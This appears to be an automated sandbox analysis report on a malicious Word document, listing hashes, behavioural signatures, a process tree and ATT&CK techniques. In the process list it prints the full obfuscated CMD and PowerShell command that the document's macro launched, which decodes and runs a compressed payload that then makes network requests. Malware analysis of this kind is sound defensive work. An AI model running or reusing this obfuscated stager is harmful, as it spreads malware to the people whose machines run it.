Analysis
-
max time kernel
101s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
21-09-2024 06:53
Behavioral task
behavioral1
Sample
ef45263ef69dd1ba6535d2794ca3411c_JaffaCakes118.doc
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
ef45263ef69dd1ba6535d2794ca3411c_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
ef45263ef69dd1ba6535d2794ca3411c_JaffaCakes118.doc
-
Size
79KB
-
MD5
ef45263ef69dd1ba6535d2794ca3411c
-
SHA1
0f5d17b848a239c75ee84c5fa70a9dff2b0ca7ad
-
SHA256
9c0bf5617ef6a3ee5f9a753fbaa7e270ab1aa6f35fd3f2ba5d6dc8fe9b7fc586
-
SHA512
518c0e2d080800cef61e3f3d743bea79adb115bae186198bddd53b6db3f8798811e3337dba3388c1fdd5379699fa23e76c3c2d28f38d835461135295a9594751
-
SSDEEP
768:Dx0zyA1VucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9MrLUvIbm547GNy:Dx0zyA1ocn1kp59gxBK85fBt+a9M+
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2900 2380 CMD.exe 28 -
Blocklisted process makes network request 8 IoCs
flow pid Process 5 2648 powershell.exe 7 2648 powershell.exe 8 2648 powershell.exe 9 2648 powershell.exe 12 2648 powershell.exe 13 2648 powershell.exe 14 2648 powershell.exe 16 2648 powershell.exe -
pid Process 2648 powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2380 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2648 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2648 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2380 WINWORD.EXE 2380 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2380 wrote to memory of 988 2380 WINWORD.EXE 29 PID 2380 wrote to memory of 988 2380 WINWORD.EXE 29 PID 2380 wrote to memory of 988 2380 WINWORD.EXE 29 PID 2380 wrote to memory of 988 2380 WINWORD.EXE 29 PID 2380 wrote to memory of 2900 2380 WINWORD.EXE 30 PID 2380 wrote to memory of 2900 2380 WINWORD.EXE 30 PID 2380 wrote to memory of 2900 2380 WINWORD.EXE 30 PID 2380 wrote to memory of 2900 2380 WINWORD.EXE 30 PID 2900 wrote to memory of 2648 2900 CMD.exe 33 PID 2900 wrote to memory of 2648 2900 CMD.exe 33 PID 2900 wrote to memory of 2648 2900 CMD.exe 33 PID 2900 wrote to memory of 2648 2900 CMD.exe 33
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ef45263ef69dd1ba6535d2794ca3411c_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:988
-
-
C:\Windows\SysWOW64\CMD.exeCMD C:\wiNDOWS\sYsteM32\cMD /c "sET gYT= ^& ((GV '*Mdr*').NAme[3,11,2]-jOIn'')( ((("{54}{109}{71}{74}{136}{44}{104}{96}{36}{80}{141}{43}{28}{132}{21}{137}{34}{105}{10}{49}{72}{87}{145}{69}{100}{11}{37}{16}{13}{48}{130}{76}{45}{59}{82}{15}{26}{5}{0}{52}{40}{101}{135}{83}{29}{120}{140}{88}{129}{62}{66}{84}{118}{112}{86}{131}{123}{50}{134}{126}{75}{115}{125}{57}{117}{111}{60}{35}{103}{79}{46}{77}{65}{58}{90}{73}{32}{39}{41}{138}{93}{19}{7}{8}{22}{116}{127}{61}{23}{122}{99}{70}{102}{53}{142}{113}{67}{47}{133}{31}{128}{68}{144}{12}{95}{108}{97}{91}{56}{24}{64}{85}{106}{51}{78}{30}{1}{110}{119}{89}{94}{4}{2}{3}{6}{81}{143}{25}{92}{33}{14}{17}{38}{20}{27}{121}{114}{18}{55}{124}{98}{139}{9}{107}{42}{63}" -f 'cSy','s','::dEcOMpReSs )','Fyc%{ ne','rESSIOnMode]','JQdLBlG','w-oB','bu','pnX5VFO2ybVy',' ','ESSioN','m.COn','yU+','F','Er(','EI','t]::',' hR','c','ZjRR','_ ,','JeCT ','P','Kc','PO5qT','S','Rf',' [T','ne','UN6dhBb1OvPtaGbJ','[Io.cOmPrE','2d','uG0dHP9sX3/BwBO4Gylr','d','.com','xZ',']-j','vEr','G','/fqWd0cX','hQSk','R7Lw','E','lGZ) (',').Name[3','trING(lGZ','t9','r','rOMBa','.DeFlatestReAM( [sYsTEM.Io','3Cko','lGZ)','UkrEhU0E','c2Mx','. ((','I','u6AL7','H','Zf1+rA','RZDN','9Z','QBXR0P6','U63AO','aDtoEnD()','CD','h+i','E','R','Jm','sY','gDI4AuVbtJDI','GZ*md','.mE','eCDwKxKwlT','r*lG','v','64s','y',',','5hO','oin','JeC','bsIw','FGjhMT','7k','4bwNvSq8','DkOw','MOrySt','8','oM','Uq+oGCYv','Z','TrEamRea','RFDj','P','s','11,2','y',' ','Jhq7OCQD+g3HXT+','StE','vpz','tE','l',',','Pr','bZxkvJGJk+m5aS4=',').r','NF','gv l','sION','G','lw+','E3','AS','On','TqhfU','+','Mo9o6','.C','g3qNDPghij','ext.enCODIng]::','xD6OC','q','i)','J','pc','4ek0U','n6zNpv8','Q','se','xdCBTA1','w-oB','+','mMRDuP','6WX2F2Iif','Z',' Io','t','}','1IF6zAsS','lGZ','8o','T io.','bU+N','REAm][')) -rEPLaCe([chAR]108+[chAR]71+[chAR]90),[chAR]39-creplACe 'hRG',[chAR]36 -creplACe([chAR]70+[chAR]121+[chAR]99),[chAR]124) ) && PoWersHELL SET-itEM VarIaBlE:tl32V ( [TYPE](\"{1}{2}{0}\"-f 'meNT','EnviRO','N') ); (.( \"{1}{2}{0}\"-f'Tem','Get-cHI','LDI') (\"{0}{2}{1}{4}{3}\" -f'vari','CutIOnConT','aBLE:eXe','xT','e' )).\"val`Ue\".\"invo`KECo`MMAnD\".\"inV`OkEsc`RipT\"( ( (cHILDiTeM VARiABlE:TL32V ).vaLUE::( \"{1}{5}{0}{4}{2}{3}\"-f 'r','gEtEn','NtvAriabL','e','oNMe','Vi' ).Invoke( 'GyT',( \"{1}{2}{0}\"-f 'CEsS','pR','o') ) ) )"2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoWersHELL SET-itEM VarIaBlE:tl32V ( [TYPE](\"{1}{2}{0}\"-f 'meNT','EnviRO','N') ); (.( \"{1}{2}{0}\"-f'Tem','Get-cHI','LDI') (\"{0}{2}{1}{4}{3}\" -f'vari','CutIOnConT','aBLE:eXe','xT','e' )).\"val`Ue\".\"invo`KECo`MMAnD\".\"inV`OkEsc`RipT\"( ( (cHILDiTeM VARiABlE:TL32V ).vaLUE::( \"{1}{5}{0}{4}{2}{3}\"-f 'r','gEtEn','NtvAriabL','e','oNMe','Vi' ).Invoke( 'GyT',( \"{1}{2}{0}\"-f 'CEsS','pR','o') ) ) )3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5ce081821e53912ff31f4a12da3ca883a
SHA126025609dc03e2188a609e6e3636814da74acc27
SHA256dc69f94290524e2601b8c3b85a82d100d42a012c5195320a21a65f4ee37d7d32
SHA512619fae43e6bdab0662d5552a16a91d7316b3b07854ec75da483b3910070396557c1d7fa201d730af1b1f673b292f08a56b5e7d0066c44bfa8dea336323b46f0c